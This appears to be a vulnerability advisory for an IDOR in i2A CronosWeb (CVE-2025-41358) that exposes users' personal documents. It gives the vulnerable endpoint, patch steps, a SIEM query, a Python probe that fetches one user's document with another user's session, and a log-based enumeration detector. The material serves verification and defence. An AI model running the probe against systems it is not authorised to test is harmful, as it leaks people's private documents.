CVE-2025-41358
📋 TL;DR
An Insecure Direct Object Reference (IDOR) in i2A's CronosWeb lets any authenticated user retrieve other users' personal documents by changing the documentCode parameter in requests to the personal-documents endpoint; the server serves whatever documentCode is supplied without checking that it belongs to the requesting user. All CronosWeb versions prior to 25.00.00.12 are affected. Any organization running an unpatched instance is exposed to data leakage by its own users or by anyone holding a compromised account.
💻 Affected Systems
- i2A CronosWeb
⚠️ Manual Verification Required
Automated matching may not identify affected hosts if your scanner cannot read the CronosWeb build, and the NVD entry did not carry machine-readable version ranges at the time this page was written. The vendor advisory (INCIBE, linked under Official Fix) states that versions prior to 25.00.00.12 are affected, so confirm the installed version and behaviour by hand:
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test whether the vulnerability is exploitable in your environment (see How to Verify)
- Update to 25.00.00.12 or later; there is no configuration-only fix
⚠️ Risk & Real-World Impact
Worst Case
Mass exfiltration of sensitive personal documents including identification, financial records, and confidential employee information, potentially leading to identity theft, regulatory violations, and reputational damage.
Likely Case
Targeted access to specific users' documents for espionage, blackmail, or unauthorized information gathering by malicious insiders or compromised accounts.
If Mitigated
Limited exposure if proper access controls, monitoring, and network segmentation are implemented, though the vulnerability still exists.
🎯 Exploit Status
Simple parameter manipulation attack requiring only authenticated access to the web interface.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 25.00.00.12 or later
Vendor Advisory: https://www.incibe.es/en/incibe-cert/notices/aviso/direct-reference-insecure-objects-idor-cronosweb-cronosweb-i2a
Restart Required: Yes
Instructions:
1. Download CronosWeb version 25.00.00.12 or later from i2A.
2. Back up the current installation and database.
3. Apply the update following i2A's installation guide.
4. Restart the CronosWeb service.
5. Verify the fix by testing document access controls (see How to Verify).
🔧 Temporary Workarounds
Web Application Firewall (WAF) Rule
Block or alert on suspicious documentCode patterns in requests to the vulnerable endpoint. A WAF cannot know which documentCode belongs to which user, so it cannot stop a single targeted request; what it can do is rate-limit and alert on one session cycling through many distinct documentCodes in a short window, which is the enumeration pattern rather than the vulnerability itself.
WAF-specific configuration required
Access Restriction
Restrict access to the /CronosWeb/Modulos/Personas/DocumentosPersonales/AdjuntarDocumentosPersonas endpoint to only the personnel who need it, by source network or identity, until the patch is applied.
Firewall/load balancer configuration required
🧯 If You Can't Patch
- Implement strict access controls and monitoring on the vulnerable endpoint
- Deploy additional authentication/authorization layer before the vulnerable functionality
🔍 How to Verify
Check if Vulnerable:
Log in as user A and note a documentCode that A can legitimately open. Then, from a separate session as user B, request /CronosWeb/Modulos/Personas/DocumentosPersonales/AdjuntarDocumentosPersonas with that same documentCode. If B receives A's document rather than an authorization error or a redirect to the login page, the instance is vulnerable.
Check Version:
Check CronosWeb version in application interface or configuration files
Verify Fix Applied:
After patching, verify that documentCode parameter manipulation no longer allows access to unauthorized documents
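The cross-user check above, written out as a small probe. This is an added example, not i2A's code and not part of the INCIBE advisory. It assumes documentCode is sent as a GET query parameter (the page only says "parameter"; if the endpoint takes it in a POST body, change `fetch` accordingly), that each tester already holds a valid session cookie, and that a fixed server answers a foreign documentCode with 401/403/404 or a redirect to login. The `classify` decision is separated from the network code so it can be checked on its own, and redirects are deliberately not followed so a bounce to the login page is not mistaken for a successful 200. Run it only against systems you are authorised to test.

```python
"""Cross-user documentCode probe for CVE-2025-41358 (added example, not vendor code)."""
import sys
import urllib.error
import urllib.parse
import urllib.request

ENDPOINT = "/CronosWeb/Modulos/Personas/DocumentosPersonales/AdjuntarDocumentosPersonas"


class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Report 3xx as-is instead of following it (a login redirect is a deny)."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def fetch(base_url, cookie_header, document_code, timeout=15):
    """Request one document as the session identified by cookie_header.

    Assumes documentCode travels as a GET query parameter. Returns (status, body)
    for any HTTP response, including error and redirect responses.
    """
    query = urllib.parse.urlencode({"documentCode": document_code})
    url = base_url.rstrip("/") + ENDPOINT + "?" + query
    req = urllib.request.Request(url, headers={"Cookie": cookie_header})
    opener = urllib.request.build_opener(NoRedirect())
    try:
        with opener.open(req, timeout=timeout) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as err:
        return err.code, err.read()


def classify(baseline, cross):
    """Decide what the two responses show.

    baseline: (status, body) for the owner fetching their own documentCode.
    cross:    (status, body) for a different authenticated user requesting
              the same documentCode.
    Returns "vulnerable", "denied" or "inconclusive".
    """
    b_status, b_body = baseline
    c_status, c_body = cross
    if b_status != 200:
        # The owner cannot fetch it either, so there is nothing to compare against.
        return "inconclusive"
    if c_status in (401, 403, 404) or 300 <= c_status < 400:
        # Explicit refusal, hidden object, or redirect to login: access control held.
        return "denied"
    if c_status == 200 and c_body == b_body:
        # Second user received byte-identical content for a document they do not own.
        return "vulnerable"
    # 200 with different content (e.g. an HTML error page rendered with status 200),
    # or a 5xx: needs a human look rather than an automatic verdict.
    return "inconclusive"


def main(argv):
    if len(argv) != 5:
        print("usage: probe.py BASE_URL COOKIE_USER_A COOKIE_USER_B DOCUMENTCODE_OWNED_BY_A")
        return 2
    base, cookie_a, cookie_b, code = argv[1:]
    baseline = fetch(base, cookie_a, code)
    cross = fetch(base, cookie_b, code)
    verdict = classify(baseline, cross)
    print(f"owner -> {baseline[0]} ({len(baseline[1])} bytes); "
          f"other user -> {cross[0]} ({len(cross[1])} bytes): {verdict}")
    return 1 if verdict == "vulnerable" else 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it once before patching (expect "vulnerable") and once after (expect "denied"); an "inconclusive" result usually means the application returns its error page with HTTP 200, in which case compare the two bodies manually.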
📡 Detection & Monitoring
Log Indicators:
- Multiple failed document access attempts
- Rapid sequential access to different documentCodes from same user
- Access to documentCodes outside user's normal range
Network Indicators:
- Unusual patterns of requests to the vulnerable endpoint
- Parameter tampering in documentCode values
SIEM Query (Splunk-style pseudo-query; assumes documentCode and the authenticated user are extracted as fields from the web server or proxy log):
source="cronosweb" uri_path="/CronosWeb/Modulos/Personas/DocumentosPersonales/AdjuntarDocumentosPersonas" | bin _time span=1m | stats dc(documentCode) AS distinct_codes BY _time, user | where distinct_codes > 5
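The three log indicators above (rapid cycling through distinct documentCodes, access to codes outside a user's own set, and repeated failed attempts), implemented as an offline check over access-log lines. This is an added example rather than anything from i2A or the advisory. It assumes the reverse proxy in front of CronosWeb writes a combined-style access log with the authenticated username in the remote-user field and documentCode as a query parameter; the log lines and the ownership map below are constructed for illustration, and the thresholds are starting points to tune against your own traffic.

```python
"""Detect documentCode enumeration against the CronosWeb endpoint (added example)."""
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qs, urlparse

ENDPOINT = "/CronosWeb/Modulos/Personas/DocumentosPersonales/AdjuntarDocumentosPersonas"

# Common Log Format with the remote-user field populated by the proxy (assumption).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)

# Constructed sample: alice opens her own two documents, then walks through
# bob's range (some codes do not exist and return 404); bob behaves normally.
SAMPLE_LOG = "\n".join([
    '10.0.0.5 - alice [12/Mar/2025:09:00:01 +0100] "GET ' + ENDPOINT + '?documentCode=1001 HTTP/1.1" 200 5120',
    '10.0.0.5 - alice [12/Mar/2025:09:00:03 +0100] "GET ' + ENDPOINT + '?documentCode=1002 HTTP/1.1" 200 4096',
    '10.0.0.5 - alice [12/Mar/2025:09:00:10 +0100] "GET ' + ENDPOINT + '?documentCode=2001 HTTP/1.1" 200 8000',
    '10.0.0.5 - alice [12/Mar/2025:09:00:12 +0100] "GET ' + ENDPOINT + '?documentCode=2002 HTTP/1.1" 200 7100',
    '10.0.0.5 - alice [12/Mar/2025:09:00:14 +0100] "GET ' + ENDPOINT + '?documentCode=2003 HTTP/1.1" 404 310',
    '10.0.0.5 - alice [12/Mar/2025:09:00:16 +0100] "GET ' + ENDPOINT + '?documentCode=2004 HTTP/1.1" 200 6600',
    '10.0.0.5 - alice [12/Mar/2025:09:00:18 +0100] "GET ' + ENDPOINT + '?documentCode=2005 HTTP/1.1" 404 310',
    '10.0.0.5 - alice [12/Mar/2025:09:00:20 +0100] "GET ' + ENDPOINT + '?documentCode=2006 HTTP/1.1" 404 310',
    '10.0.0.9 - bob   [12/Mar/2025:09:05:00 +0100] "GET ' + ENDPOINT + '?documentCode=2001 HTTP/1.1" 200 8000',
    '10.0.0.9 - bob   [12/Mar/2025:09:05:30 +0100] "GET /CronosWeb/Login HTTP/1.1" 200 1200',
])

# Which documentCodes each user legitimately owns (constructed; in production
# this comes from the HR database or an export of the documents table).
OWNERSHIP = {"alice": {"1001", "1002"}, "bob": {"2001", "2002", "2004"}}


def parse_line(line):
    """Return an event for a documentCode request to the endpoint, else None."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    url = urlparse(m.group("target"))
    if url.path != ENDPOINT:
        return None
    codes = parse_qs(url.query).get("documentCode")
    if not codes:
        return None
    return {
        "user": m.group("user"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "code": codes[0],
        "status": int(m.group("status")),
    }


def analyse(log_text, ownership, window_seconds=60, rapid_threshold=5, fail_threshold=3):
    """Apply the three indicators per user; return a list of alert dicts."""
    by_user = defaultdict(list)
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev:
            by_user[ev["user"]].append(ev)

    alerts = []
    for user, evs in by_user.items():
        evs.sort(key=lambda e: e["ts"])
        owned = ownership.get(user, set())

        # 1. Rapid sequential access: many distinct codes inside a sliding window.
        for i, start in enumerate(evs):
            window = {e["code"] for e in evs[i:]
                      if (e["ts"] - start["ts"]).total_seconds() <= window_seconds}
            if len(window) >= rapid_threshold:
                alerts.append({"rule": "rapid_enumeration", "user": user, "codes": sorted(window)})
                break

        # 2. Codes outside the user's own set (the IDOR itself, if the server served them).
        foreign = sorted({e["code"] for e in evs if e["code"] not in owned})
        if foreign:
            alerts.append({"rule": "foreign_document", "user": user, "codes": foreign})

        # 3. Repeated non-2xx answers: guessing codes that do not exist or are denied.
        failures = [e["code"] for e in evs if not 200 <= e["status"] < 300]
        if len(failures) >= fail_threshold:
            alerts.append({"rule": "repeated_failures", "user": user, "codes": failures})
    return alerts


if __name__ == "__main__":
    for alert in analyse(SAMPLE_LOG, OWNERSHIP):
        print(f"{alert['rule']:<18} user={alert['user']:<6} codes={','.join(alert['codes'])}")
```

The foreign_document rule is the one that matters after patching as well as before: on a fixed server those requests should all be 403/404, and a user who keeps generating them is still worth a conversation. The rapid_enumeration rule is what a WAF rate limit can approximate; the ownership rule cannot be done at the edge because only the application knows who owns which documentCode.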